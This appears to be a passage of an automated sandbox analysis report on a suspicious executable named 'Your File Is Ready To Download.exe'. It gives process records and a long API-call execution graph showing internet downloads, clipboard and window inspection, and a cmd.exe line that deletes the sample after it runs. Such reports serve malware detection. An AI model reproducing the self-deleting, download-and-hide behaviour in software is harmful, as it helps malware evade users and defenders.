                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Start time:19:08:49
                                                                                                                                                                                                                        Start date:06/12/2021
                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1560,9168717871619031808,7731561381671023239,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1908 /prefetch:8
                                                                                                                                                                                                                        Imagebase:0x7ff68b0a0000
                                                                                                                                                                                                                        File size:2150896 bytes
                                                                                                                                                                                                                        MD5 hash:C139654B5C1438A95B321BB01AD63EF6
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Start time:19:09:11
                                                                                                                                                                                                                        Start date:06/12/2021
                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c del "C:\Users\user\Desktop\Your File Is Ready To Download.exe"
                                                                                                                                                                                                                        Imagebase:0x7ff6fa270000
                                                                                                                                                                                                                        File size:273920 bytes
                                                                                                                                                                                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Start time:19:09:12
                                                                                                                                                                                                                        Start date:06/12/2021
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff7f20f0000
                                                                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                        Code Analysis

                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:2.1%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                          Signature Coverage:51.3%
                                                                                                                                                                                                                          Total number of Nodes:1865
                                                                                                                                                                                                                          Total number of Limit Nodes:83

                                                                                                                                                                                                                          Graph

                                                                                                                                                                                                                          execution_graph 141656 140049325 141657 14004932e GetExitCodeProcess 141656->141657 141665 14004916c 141656->141665 141658 14004941b CloseHandle 141657->141658 141660 1400490de 141657->141660 141658->141665 141659 140049353 GetTickCount 141659->141660 141661 140049447 141659->141661 141660->141659 141660->141665 141672 1400b12d0 141660->141672 141662 14004949e 141661->141662 141666 1400494b0 141661->141666 141667 140049456 141661->141667 141695 140005ff0 21 API calls 2 library calls 141662->141695 141666->141667 141668 14004955a 141666->141668 141670 14004953a 141666->141670 141667->141665 141696 1400a8e00 141668->141696 141670->141667 141702 1400c8f74 141670->141702 141674 1400b12ed _flush 141672->141674 141673 1400b1373 141678 1400b1389 141673->141678 141712 1400b2bc0 141673->141712 141674->141673 141676 1400b1324 GetForegroundWindow 141674->141676 141679 1400b1332 141676->141679 141680 1400b1350 141676->141680 141678->141660 141679->141680 141681 1400b133b IsWindowVisible 141679->141681 141680->141678 141681->141680 141684 1400b1348 141681->141684 141682 1400b1439 141685 1400b1448 IsWindow 141682->141685 141693 1400b147e 141682->141693 141683 1400b14b4 EnumWindows 141683->141678 141724 1400b29a0 LoadLibraryW GetProcAddress 141684->141724 141685->141678 141688 1400b1455 141685->141688 141686 1400b149f 141738 1400b31d0 87 API calls 141686->141738 141725 1400b2a30 LoadLibraryW GetProcAddress IsWindowVisible 141688->141725 141692 1400b1464 141692->141693 141694 1400b1468 GetWindowLongW 141692->141694 141693->141686 141726 1400b30e0 141693->141726 141694->141678 141694->141693 141695->141667 141697 1400a8e15 141696->141697 141701 1400a8e42 141696->141701 141698 1400a8e24 141697->141698 141754 1400a8e90 141697->141754 141700 1400a8e90 20 API calls 141698->141700 141698->141701 141700->141701 141701->141667 141703 1400c8f8c 141702->141703 141704 1400c9008 _callnewh _errno 141702->141704 141706 1400c8fc4 RtlAllocateHeap 141703->141706 141707 1400c8fa4 _FF_MSGBANNER 141703->141707 141708 1400c8fed _errno 141703->141708 141709 1400c8fdf _callnewh 141703->141709 141781 1400c9218 141703->141781 141705 1400c9003 141704->141705 141705->141667 141706->141703 141706->141705 141707->141703 141710 1400c8ff8 _errno 141708->141710 141709->141703 141709->141710 141710->141705 141714 1400b2bf3 wcsncpy 141712->141714 141713 1400b3064 wcsncpy 141715 1400b1403 141713->141715 141716 1400b30e0 10 API calls 141713->141716 141714->141713 141714->141715 141718 1400b2d2b IsWindow 141714->141718 141720 1400ca754 16 API calls 141714->141720 141721 1400c9144 20 API calls 141714->141721 141739 1400caf90 20 API calls _wcstoui64 141714->141739 141740 1400caf60 20 API calls _wcstoui64 141714->141740 141741 1400ca468 20 API calls _wcstoui64 141714->141741 141742 1400c8eec _errno _invalid_parameter_noinfo 141714->141742 141715->141678 141715->141682 141715->141683 141716->141715 141718->141714 141718->141715 141720->141714 141721->141714 141724->141680 141725->141692 141727 1400b30f9 141726->141727 141728 1400b31bd 141726->141728 141727->141728 141729 1400b311f GetWindowTextW 141727->141729 141730 1400b3136 141727->141730 141728->141686 141729->141730 141731 1400b3142 GetWindowThreadProcessId 141730->141731 141732 1400b3156 141730->141732 141731->141732 141733 1400b315b GetWindowThreadProcessId 141732->141733 141734 1400b3189 141732->141734 141733->141734 141735 1400b3171 141733->141735 141734->141728 141736 1400b31a3 GetClassNameW 141734->141736 141743 140078b30 OpenProcess 141735->141743 141736->141728 141738->141678 141739->141714 141740->141714 141741->141714 141742->141714 141744 140078b6e OpenProcess 141743->141744 141745 140078b8a 141743->141745 141744->141745 141746 140078cdc 141744->141746 141747 140078ba5 K32GetModuleBaseNameW 141745->141747 141748 140078bad GetModuleFileNameExW 141745->141748 141746->141734 141752 140078bb3 141747->141752 141748->141752 141749 140078cc9 CloseHandle 141749->141746 141750 140078bea 141750->141749 141753 140078c03 141750->141753 141751 140078c40 QueryDosDeviceW 141751->141752 141752->141749 141752->141750 141752->141751 141752->141753 141753->141749 141759 1400ca630 141754->141759 141757 1400c8f74 malloc 10 API calls 141758 1400a8eba 141757->141758 141758->141698 141760 1400ca647 141759->141760 141761 1400c8f74 malloc 10 API calls 141760->141761 141762 1400ca63b _callnewh 141760->141762 141763 1400a8ea0 141760->141763 141761->141760 141762->141760 141765 1400ca65a 141762->141765 141763->141757 141763->141758 141764 1400ca6ab std::exception::exception 141766 1400ca6d2 141764->141766 141765->141764 141768 1400c9ba0 141765->141768 141771 1400c9a94 141768->141771 141780 1400c9230 141771->141780 141784 1400c91dc GetModuleHandleW 141781->141784 141785 1400c920f ExitProcess 141784->141785 141786 1400c91f6 GetProcAddress 141784->141786 141786->141785 141787 1400c920b 141786->141787 141787->141785 141788 1400b15b0 141789 1400b15cd IsWindowVisible 141788->141789 141790 1400b15e3 141788->141790 141792 1400b1605 141789->141792 141793 1400b15d7 141789->141793 141791 1400b15fb 141790->141791 141795 1400b30e0 10 API calls 141790->141795 141799 1400b31d0 87 API calls 141791->141799 141798 1400b29a0 LoadLibraryW GetProcAddress 141793->141798 141795->141791 141797 1400b15df 141797->141790 141797->141792 141798->141797 141799->141792 141800 140035da7 141823 14007d8a0 141800->141823 141802 140032011 GetTickCount 141805 140032030 PeekMessageW 141802->141805 141807 140031fd7 141802->141807 141803 140031fea GlobalUnlock 141804 140031ffe CloseClipboard 141803->141804 141804->141802 141806 140032059 GetTickCount 141805->141806 141805->141807 141806->141807 141807->141802 141807->141803 141807->141804 141807->141806 141808 140032111 GetTickCount 141807->141808 141810 140031f30 134 API calls 141807->141810 141811 14003851b 141807->141811 141812 140088c90 141807->141812 141808->141807 141810->141807 141813 140088cb8 141812->141813 141817 140088cc1 141812->141817 141889 140089180 GetEnvironmentVariableW GetEnvironmentVariableW 141813->141889 141815 140088cca 141815->141807 141816 1400c8f74 malloc 10 API calls 141822 140088d83 141816->141822 141817->141815 141817->141816 141817->141822 141819 140088e22 141820 140088d92 141819->141820 141821 140089131 SetTimer 141819->141821 141820->141807 141821->141820 141822->141819 141822->141820 141862 140085530 141822->141862 141825 14007d8d0 141823->141825 141824 14007d960 InternetOpenW 141826 14007d987 InternetOpenUrlW 141824->141826 141827 14007d9b3 141824->141827 141825->141824 142028 140014440 16 API calls 141825->142028 141829 14007d9da 141826->141829 141830 14007d9aa InternetCloseHandle 141826->141830 142031 14003ebc0 141827->142031 142013 1400cb6dc 141829->142013 141830->141827 141831 14007d8f7 141834 14007d90e 141831->141834 141835 14007d8fe 141831->141835 142030 1400ca468 20 API calls _wcstoui64 141834->142030 142029 1400caf60 20 API calls _wcstoui64 141835->142029 141837 14007d9f1 141839 14007da12 141837->141839 141840 14007d9f9 InternetCloseHandle InternetCloseHandle 141837->141840 141841 14007db2e InternetReadFileExA 141839->141841 141844 14007da62 InternetReadFile 141839->141844 141850 14007dc11 141840->141850 141843 14007dbe8 InternetCloseHandle InternetCloseHandle 141841->141843 141854 14007db4d 141841->141854 141842 14003ebc0 137 API calls 141846 14007d9bd 141842->141846 142023 1400cb980 141843->142023 141844->141843 141857 14007da86 141844->141857 141846->141807 141847 14007dc02 141849 14007dc06 DeleteFileW 141847->141849 141847->141850 141848 14007db5b GetTickCount 141851 14007db76 PeekMessageW 141848->141851 141848->141854 141849->141850 141850->141842 141851->141854 141855 14007db9f GetTickCount 141851->141855 141852 14007da9d GetTickCount 141856 14007dab8 PeekMessageW 141852->141856 141852->141857 141853 14007d909 141853->141824 141854->141843 141854->141848 141854->141855 141859 14007dbc1 InternetReadFileExA 141854->141859 141855->141854 141856->141857 141858 14007dae1 GetTickCount 141856->141858 141857->141843 141857->141852 141857->141858 141860 14007db05 InternetReadFile 141857->141860 141858->141857 141859->141843 141859->141854 141860->141857 141861 14007db29 141860->141861 141861->141843 141870 140085559 _flush 141862->141870 141863 14008785d 141864 14008787a 141863->141864 141866 140087bfa 141863->141866 141879 1400864eb 141863->141879 141864->141879 141940 1400aee30 41 API calls malloc 141864->141940 141868 140087c6c 141866->141868 141871 140087c7c 141866->141871 141866->141879 141941 140005ff0 21 API calls 2 library calls 141868->141941 141870->141863 141870->141866 141872 140085acd GetEnvironmentVariableW 141870->141872 141875 1400857e3 GetEnvironmentVariableW 141870->141875 141878 1400ca468 20 API calls 141870->141878 141870->141879 141881 1400b03b0 11 API calls 141870->141881 141883 1400ca754 16 API calls 141870->141883 141885 1400caf60 20 API calls _wcstoi64 141870->141885 141887 1400a8e00 20 API calls 141870->141887 141888 1400c8f74 10 API calls malloc 141870->141888 141890 140088360 141870->141890 141914 14002e080 141870->141914 141937 140005ff0 21 API calls 2 library calls 141870->141937 141938 1400aee30 41 API calls malloc 141870->141938 141939 1400cafc4 29 API calls 4 library calls 141870->141939 141873 140087d49 141871->141873 141877 140087d69 141871->141877 141871->141879 141872->141870 141873->141879 141882 1400c8f74 malloc 10 API calls 141873->141882 141875->141870 141880 1400a8e00 20 API calls 141877->141880 141878->141870 141879->141822 141880->141879 141881->141870 141882->141879 141883->141870 141885->141870 141887->141870 141888->141870 141889->141817 141903 1400883cb 141890->141903 141907 14008846e _flush 141890->141907 141891 14008857d 141942 140071ba0 141891->141942 141893 140088afa 141894 140088b29 141893->141894 141895 140088b17 141893->141895 141908 140088b24 141893->141908 141899 1400ca630 20 API calls 141894->141899 141954 1400a22c0 29 API calls malloc 141895->141954 141897 140088408 141950 1400d9118 RtlPcToFileHeader 141897->141950 141899->141908 141901 140088548 141901->141870 141903->141897 141949 140040d50 OutputDebugStringW 141903->141949 141904 1400885b6 141911 14008864e 141904->141911 141951 1400b04e0 10 API calls malloc 141904->141951 141906 1400aee30 41 API calls 141906->141911 141907->141891 141907->141901 141907->141904 141908->141901 141955 140031f30 141908->141955 141910 1400a8e00 20 API calls 141910->141911 141911->141893 141911->141901 141911->141906 141911->141910 141912 1400c8f74 malloc 10 API calls 141911->141912 141952 14001c1b0 CharUpperW OutputDebugStringW _errno _invalid_parameter_noinfo 141911->141952 141953 140005ff0 21 API calls 2 library calls 141911->141953 141912->141911 141915 14002e0cb 141914->141915 141917 14002e0a4 wcsncpy 141914->141917 141915->141870 141917->141915 141990 14002e730 141917->141990 141919 14002e281 141994 1400a8d40 141919->141994 141922 14002e1ec 141922->141919 141923 14002e1f4 141922->141923 141923->141915 141928 14002e080 30 API calls 141923->141928 141924 14002e293 141924->141915 141925 14002e2d2 141924->141925 141926 1400a8e90 20 API calls 141924->141926 141925->141915 141927 1400a8e90 20 API calls 141925->141927 141932 14002e2fc 141925->141932 141926->141925 141927->141932 141928->141915 141929 14002e448 141929->141915 141999 1400ca474 141929->141999 141932->141915 141932->141929 141933 14002e4f7 141932->141933 141934 1400c8f74 malloc 10 API calls 141932->141934 141933->141915 141936 14002e5af 141933->141936 142010 1400c8eec _errno _invalid_parameter_noinfo 141933->142010 141934->141929 141936->141915 142011 1400c8eec _errno _invalid_parameter_noinfo 141936->142011 141937->141870 141938->141870 141939->141870 141940->141879 141941->141879 141943 140071be8 141942->141943 141944 140071c57 141943->141944 141945 140071c7e 141943->141945 141946 1400b12d0 95 API calls 141944->141946 141966 1400b10d0 141945->141966 141948 140071c7c _ui64tow 141946->141948 141948->141901 141949->141897 141950->141907 141951->141911 141952->141911 141953->141911 141954->141908 141964 140031fad 141955->141964 141965 14003851b 141955->141965 141956 140032011 GetTickCount 141959 140032030 PeekMessageW 141956->141959 141956->141964 141957 140031fea GlobalUnlock 141958 140031ffe CloseClipboard 141957->141958 141958->141956 141960 140032059 GetTickCount 141959->141960 141959->141964 141960->141964 141961 140032111 GetTickCount 141961->141964 141962 140088c90 128 API calls 141962->141964 141963 140031f30 128 API calls 141963->141964 141964->141956 141964->141957 141964->141958 141964->141960 141964->141961 141964->141962 141964->141963 141964->141965 141965->141901 141967 1400b10ef _flush 141966->141967 141968 1400b1181 GetForegroundWindow 141967->141968 141970 1400b1131 GetForegroundWindow 141967->141970 141969 1400b119b 141968->141969 141986 1400b11b9 141968->141986 141971 1400b11fc 141969->141971 141972 1400b11db IsWindowVisible 141969->141972 141969->141986 141973 1400b113f 141970->141973 141981 1400b115d 141970->141981 141975 1400b30e0 10 API calls 141971->141975 141974 1400b11ec 141972->141974 141972->141986 141976 1400b1148 IsWindowVisible 141973->141976 141973->141981 141988 1400b29a0 LoadLibraryW GetProcAddress 141974->141988 141978 1400b1260 141975->141978 141979 1400b1155 141976->141979 141976->141981 141982 1400b2bc0 37 API calls 141978->141982 141987 1400b29a0 LoadLibraryW GetProcAddress 141979->141987 141980 1400b11f4 141980->141971 141980->141986 141981->141986 141984 1400b127d 141982->141984 141984->141986 141989 1400b31d0 87 API calls 141984->141989 141986->141948 141987->141981 141988->141980 141989->141986 141993 14002e751 141990->141993 141991 14002e1c8 141991->141919 141991->141923 142009 1400c8eec _errno _invalid_parameter_noinfo 141991->142009 141993->141991 142012 1400c8eec _errno _invalid_parameter_noinfo 141993->142012 141995 1400a8d59 141994->141995 141996 1400a8de5 141994->141996 141995->141996 141997 1400a8e00 20 API calls 141995->141997 141996->141924 141998 1400a8d92 141997->141998 141998->141924 142000 1400ca48e 141999->142000 142001 1400ca498 141999->142001 142002 1400c8f74 malloc 10 API calls 142000->142002 142003 1400ca496 142001->142003 142004 1400ca4ed _callnewh _errno 142001->142004 142005 1400ca4aa HeapReAlloc 142001->142005 142006 1400ca52b _errno GetLastError 142001->142006 142007 1400ca4db _callnewh 142001->142007 142002->142003 142003->141933 142004->142003 142005->142001 142005->142003 142006->142003 142007->142001 142008 1400ca512 _errno GetLastError 142007->142008 142008->142003 142009->141922 142010->141933 142011->141936 142012->141993 142014 1400cb5fc 142013->142014 142015 1400cb62d _errno _invalid_parameter_noinfo 142014->142015 142016 1400cb65f 142014->142016 142022 1400cb63d 142015->142022 142017 1400cb67e 142016->142017 142018 1400cb671 _errno 142016->142018 142019 1400cb6a6 142017->142019 142020 1400cb684 _errno 142017->142020 142018->142022 142051 1400d1270 142019->142051 142020->142022 142022->141837 142024 1400cb9a1 _errno _invalid_parameter_noinfo 142023->142024 142025 1400cb9b5 142023->142025 142027 1400cb9b1 142024->142027 142025->142027 142224 1400cb904 142025->142224 142027->141847 142028->141831 142029->141853 142030->141853 142034 14003ebe0 142031->142034 142035 14003eea3 142031->142035 142032 14003ef85 142041 14003ebef 142032->142041 142239 14003eaf0 137 API calls 142032->142239 142036 14003ec3d 142034->142036 142040 14003ec4f 142034->142040 142034->142041 142035->142032 142038 14003ef13 142035->142038 142035->142041 142042 14003ef25 142035->142042 142237 140005ff0 21 API calls 2 library calls 142036->142237 142238 140005ff0 21 API calls 2 library calls 142038->142238 142040->142041 142043 14003ecf7 142040->142043 142046 14003ecda 142040->142046 142041->141846 142042->142032 142042->142041 142044 14003ef81 142042->142044 142045 14003ef9e 142042->142045 142047 1400a8e00 20 API calls 142043->142047 142044->142032 142044->142041 142050 1400c8f74 malloc 10 API calls 142044->142050 142048 1400a8e00 20 API calls 142045->142048 142046->142041 142049 1400c8f74 malloc 10 API calls 142046->142049 142047->142041 142048->142032 142049->142041 142050->142032 142057 1400d12b4 142051->142057 142052 1400d12d6 _errno _invalid_parameter_noinfo 142053 1400d12e6 142052->142053 142053->142022 142054 1400d1482 142054->142052 142055 1400d14ea 142054->142055 142063 1400d6048 142055->142063 142057->142052 142057->142054 142066 1400c9144 20 API calls 142057->142066 142059 1400d147e 142059->142054 142067 1400c9144 20 API calls 142059->142067 142061 1400d14a1 142061->142054 142068 1400c9144 20 API calls 142061->142068 142069 1400d5f74 142063->142069 142066->142059 142067->142061 142068->142054 142070 1400d5fac 142069->142070 142071 1400d5f94 _errno _invalid_parameter_noinfo 142069->142071 142070->142071 142073 1400d5fd5 142070->142073 142072 1400d5fa5 142071->142072 142072->142053 142077 1400d57cc 142073->142077 142075 1400d5ff2 142075->142072 142127 1400d6350 LeaveCriticalSection 142075->142127 142078 1400d5816 _get_daylight 142077->142078 142080 1400d5f58 142078->142080 142084 1400d5836 142078->142084 142082 1400d5f94 _errno _invalid_parameter_noinfo 142080->142082 142085 1400d5fd5 142080->142085 142081 1400d586f __doserrno _errno _invalid_parameter_noinfo 142081->142075 142083 1400d5fa5 142082->142083 142083->142075 142084->142081 142089 1400d594b 142084->142089 142091 1400d5946 142084->142091 142086 1400d57cc _wsopen_s 117 API calls 142085->142086 142087 1400d5ff2 142086->142087 142087->142083 142157 1400d6350 LeaveCriticalSection 142087->142157 142128 1400d6378 142089->142128 142091->142081 142092 1400d59cc 142093 1400d59f4 CreateFileW 142092->142093 142094 1400d59d3 __doserrno _errno _errno 142092->142094 142095 1400d5abd GetFileType 142093->142095 142096 1400d5a32 142093->142096 142094->142093 142098 1400d5aca GetLastError 142095->142098 142099 1400d5b15 142095->142099 142097 1400d5a83 GetLastError 142096->142097 142100 1400d5a4a CreateFileW 142096->142100 142101 1400cd69c 142097->142101 142102 1400cd69c 142098->142102 142141 1400d60d8 SetStdHandle _errno __doserrno 142099->142141 142100->142095 142100->142097 142103 1400d5ab1 _errno 142101->142103 142104 1400d5afa CloseHandle 142102->142104 142103->142080 142104->142103 142106 1400d5b08 _errno 142104->142106 142106->142103 142107 1400d5b34 142108 1400d5b94 _lseek_nolock 142107->142108 142110 1400d5e32 142107->142110 142122 1400d5c03 142107->142122 142109 1400d5ba9 __doserrno 142108->142109 142121 1400d5bc2 142108->142121 142111 1400d5bb6 _close_nolock 142109->142111 142109->142122 142110->142080 142113 1400d5ecc CloseHandle CreateFileW 142110->142113 142111->142121 142112 1400d5bf2 _lseek_nolock 142112->142111 142112->142122 142114 1400d5f3a 142113->142114 142115 1400d5f0a GetLastError 142113->142115 142114->142080 142117 1400d5f17 142115->142117 142156 1400d6188 SetStdHandle _errno __doserrno 142117->142156 142118 1400d6ef4 31 API calls _wsopen_s 142118->142121 142121->142111 142121->142112 142121->142118 142123 1400d5d6a _close_nolock _errno 142121->142123 142124 1400d5daa _lseek_nolock 142121->142124 142125 1400d5d8b _lseek_nolock 142121->142125 142126 1400d5d52 142121->142126 142142 1400d6d5c 64 API calls 2 library calls 142121->142142 142122->142110 142122->142111 142122->142121 142143 1400d1e84 142122->142143 142123->142080 142124->142122 142125->142111 142125->142126 142126->142110 142129 1400d63a5 142128->142129 142130 1400d63b0 _lock 142129->142130 142140 1400d63a9 142129->142140 142133 1400d63ba 142130->142133 142131 1400d64cf 142158 1400cf2b4 142131->142158 142133->142131 142134 1400d6406 _lock 142133->142134 142137 1400d6447 EnterCriticalSection 142133->142137 142133->142140 142134->142133 142135 1400d6417 InitializeCriticalSectionAndSpinCount 142134->142135 142135->142133 142137->142133 142138 1400d6457 LeaveCriticalSection 142137->142138 142138->142133 142140->142092 142141->142107 142142->142121 142144 1400d1ea7 __doserrno _errno 142143->142144 142146 1400d1ebf 142143->142146 142155 1400d1f32 142144->142155 142145 1400d1f36 __doserrno _errno _invalid_parameter_noinfo 142145->142155 142146->142145 142147 1400d1ef1 142146->142147 142148 1400d62a8 _fclose_nolock 3 API calls 142147->142148 142149 1400d1ef8 142148->142149 142150 1400d1f15 _errno __doserrno 142149->142150 142151 1400d1f04 142149->142151 142153 1400d1f11 142150->142153 142176 1400d1724 142151->142176 142220 1400d6350 LeaveCriticalSection 142153->142220 142155->142122 142156->142114 142159 1400cf2d9 142158->142159 142161 1400cf319 142159->142161 142162 1400cf2f7 Sleep 142159->142162 142169 1400d3a4c 142159->142169 142161->142140 142163 1400d62a8 142161->142163 142162->142159 142162->142161 142164 1400d6313 142163->142164 142165 1400d62e9 _lock 142163->142165 142167 1400d6330 142164->142167 142168 1400d6321 EnterCriticalSection 142164->142168 142165->142164 142166 1400d62f9 InitializeCriticalSectionAndSpinCount 142165->142166 142166->142164 142167->142140 142168->142167 142170 1400d3a61 142169->142170 142172 1400d3a7e 142169->142172 142171 1400d3a6f _errno 142170->142171 142170->142172 142173 1400d3a7a 142171->142173 142172->142173 142174 1400d3a96 RtlAllocateHeap 142172->142174 142175 1400d3ab7 _callnewh 142172->142175 142173->142159 142174->142172 142174->142173 142175->142172 142175->142173 142178 1400d1746 _flush 142176->142178 142177 1400d177a __doserrno _errno _invalid_parameter_noinfo 142200 1400d176e 142177->142200 142178->142177 142181 1400d17e0 142178->142181 142178->142200 142180 1400d1e69 142180->142153 142182 1400d17f5 _isatty 142181->142182 142183 1400d1ace 142182->142183 142184 1400d1804 142182->142184 142185 1400d1ae5 142183->142185 142186 1400d1de3 WriteFile 142183->142186 142184->142183 142221 1400cd148 12 API calls _getptd 142184->142221 142190 1400d1bbe 142185->142190 142198 1400d1af3 142185->142198 142187 1400d1db1 142186->142187 142188 1400d1ab8 GetLastError 142186->142188 142192 1400d1e19 142187->142192 142196 1400d1dbd 142187->142196 142187->142200 142188->142187 142199 1400d1ca0 142190->142199 142202 1400d1bc8 142190->142202 142191 1400d1820 GetConsoleMode 142191->142183 142193 1400d1851 142191->142193 142194 1400d1e3c _errno __doserrno 142192->142194 142195 1400d1e31 142192->142195 142193->142183 142197 1400d185e GetConsoleCP 142193->142197 142194->142200 142195->142194 142195->142200 142196->142200 142201 1400d1dc2 _errno __doserrno 142196->142201 142212 1400d1878 142197->142212 142215 1400d1a8e 142197->142215 142198->142192 142203 1400d1b3f WriteFile 142198->142203 142199->142192 142205 1400d1cf0 WideCharToMultiByte 142199->142205 142223 1400d0790 8 API calls _cftof_l 142200->142223 142201->142200 142202->142192 142206 1400d1c21 WriteFile 142202->142206 142203->142188 142204 1400d1b89 142203->142204 142204->142187 142204->142198 142204->142215 142207 1400d1dd9 GetLastError 142205->142207 142214 1400d1d3e 142205->142214 142206->142188 142208 1400d1c6b 142206->142208 142207->142215 142208->142187 142208->142202 142208->142215 142210 1400d1d40 WriteFile 142213 1400d1d8a GetLastError 142210->142213 142210->142214 142211 1400d18f4 142211->142188 142211->142212 142211->142215 142216 1400d191e WideCharToMultiByte 142211->142216 142218 1400d607c __initconout WriteConsoleW _putwch_nolock 142211->142218 142219 1400d19ba WriteFile 142211->142219 142212->142211 142212->142215 142212->142216 142222 1400cac70 16 API calls _wcstoui64 142212->142222 142213->142214 142214->142199 142214->142210 142214->142215 142215->142187 142216->142215 142217 1400d1961 WriteFile 142216->142217 142217->142188 142217->142211 142218->142211 142219->142188 142219->142211 142221->142191 142222->142212 142223->142180 142225 1400cb92d 142224->142225 142226 1400cb919 _errno _invalid_parameter_noinfo 142224->142226 142227 1400cb951 142225->142227 142231 1400cf3f8 142225->142231 142226->142227 142227->142027 142232 1400cf415 142231->142232 142235 1400cb938 _freebuf _fileno 142231->142235 142233 1400cf427 _fileno 142232->142233 142232->142235 142234 1400d1e84 _flush 58 API calls 142233->142234 142234->142235 142236 1400d2048 11 API calls _fclose_nolock 142235->142236 142236->142227 142237->142041 142238->142041 142239->142041 142240 1400561e4 142241 1400561f6 142240->142241 142242 140056224 142241->142242 142243 1400561fc 142241->142243 142244 14005606d DefWindowProcW 142241->142244 142246 14005622d PostMessageW 142242->142246 142247 140056249 142242->142247 142243->142244 142245 14005607f 142243->142245 142244->142245 142246->142245 142247->142245 142248 140056260 142247->142248 142251 1400569b0 63 API calls _flush 142248->142251 142250 140056269 142250->142245 142251->142250 142252 1400c93ac _lock 142253 1400c93e8 142252->142253 142256 1400c94c2 142252->142256 142254 1400c9401 RtlDecodePointer 142253->142254 142253->142256 142255 1400c941f DecodePointer 142254->142255 142254->142256 142257 1400c9444 142255->142257 142258 1400c9523 142256->142258 142259 1400c91dc malloc 2 API calls 142256->142259 142257->142256 142262 1400c9463 DecodePointer 142257->142262 142267 1400ccfd8 EncodePointer 142257->142267 142261 1400c9519 ExitProcess 142259->142261 142268 1400ccfd8 EncodePointer 142262->142268 142264 1400c9474 142266 14001e310 46 API calls 142264->142266 142265 1400c9479 DecodePointer DecodePointer 142265->142257 142266->142265 142269 14003616b 142281 140048490 142269->142281 142271 14003851b 142272 140032011 GetTickCount 142275 140032030 PeekMessageW 142272->142275 142278 140031fd7 142272->142278 142273 140031fea GlobalUnlock 142274 140031ffe CloseClipboard 142273->142274 142274->142272 142276 140032059 GetTickCount 142275->142276 142275->142278 142276->142278 142277 140032111 GetTickCount 142277->142278 142278->142271 142278->142272 142278->142273 142278->142274 142278->142276 142278->142277 142279 140088c90 134 API calls 142278->142279 142280 140031f30 134 API calls 142278->142280 142279->142278 142280->142278 142283 1400484b1 _flush 142281->142283 142282 14004881a 142284 14004883e GetKeyboardLayout 142282->142284 142290 140048bff 142282->142290 142283->142282 142341 1400415d0 142283->142341 142285 14004885d 142284->142285 142291 140048853 142284->142291 142392 14001a6c0 MapVirtualKeyW MapVirtualKeyW _errno _invalid_parameter_noinfo 142285->142392 142289 140048538 142289->142282 142298 140048540 142289->142298 142295 140048bee 142290->142295 142398 140014440 16 API calls 142290->142398 142304 140048b08 142291->142304 142393 140078250 22 API calls 142291->142393 142293 14004888c 142300 140048898 142293->142300 142293->142304 142294 140048c42 142296 140048c5e 142294->142296 142297 140048c49 142294->142297 142303 140048d7d 142295->142303 142309 140048d37 wcsncpy 142295->142309 142312 140048d8d 142295->142312 142400 1400cafc4 29 API calls 4 library calls 142296->142400 142399 1400caf60 20 API calls _wcstoui64 142297->142399 142306 1400485b5 142298->142306 142307 1400485a3 142298->142307 142335 140048558 142298->142335 142299 1400490bb GetTickCount 142324 1400490de 142299->142324 142308 1400488d6 142300->142308 142313 1400488e8 142300->142313 142300->142335 142401 140005ff0 21 API calls 2 library calls 142303->142401 142304->142295 142395 140014440 16 API calls 142304->142395 142396 1400caf60 20 API calls _wcstoui64 142304->142396 142397 1400cafc4 29 API calls 4 library calls 142304->142397 142321 140048662 142306->142321 142330 140048644 142306->142330 142306->142335 142391 140005ff0 21 API calls 2 library calls 142307->142391 142394 140005ff0 21 API calls 2 library calls 142308->142394 142309->142299 142312->142309 142317 140048e52 142312->142317 142325 140048e32 142312->142325 142320 140048981 142313->142320 142332 140048961 142313->142332 142313->142335 142314 140049353 GetTickCount 142322 140049447 142314->142322 142314->142324 142316 1400b12d0 95 API calls 142316->142324 142326 1400a8e00 20 API calls 142317->142326 142331 1400a8e00 20 API calls 142320->142331 142328 1400a8e00 20 API calls 142321->142328 142323 14004949e 142322->142323 142329 140049456 142322->142329 142333 1400494b0 142322->142333 142402 140005ff0 21 API calls 2 library calls 142323->142402 142324->142314 142324->142316 142324->142335 142325->142309 142334 1400c8f74 malloc 10 API calls 142325->142334 142326->142309 142328->142335 142329->142335 142330->142335 142337 1400c8f74 malloc 10 API calls 142330->142337 142331->142335 142332->142335 142336 1400c8f74 malloc 10 API calls 142332->142336 142333->142329 142333->142335 142338 14004955a 142333->142338 142340 14004953a 142333->142340 142334->142309 142335->142278 142336->142335 142337->142335 142339 1400a8e00 20 API calls 142338->142339 142339->142329 142340->142329 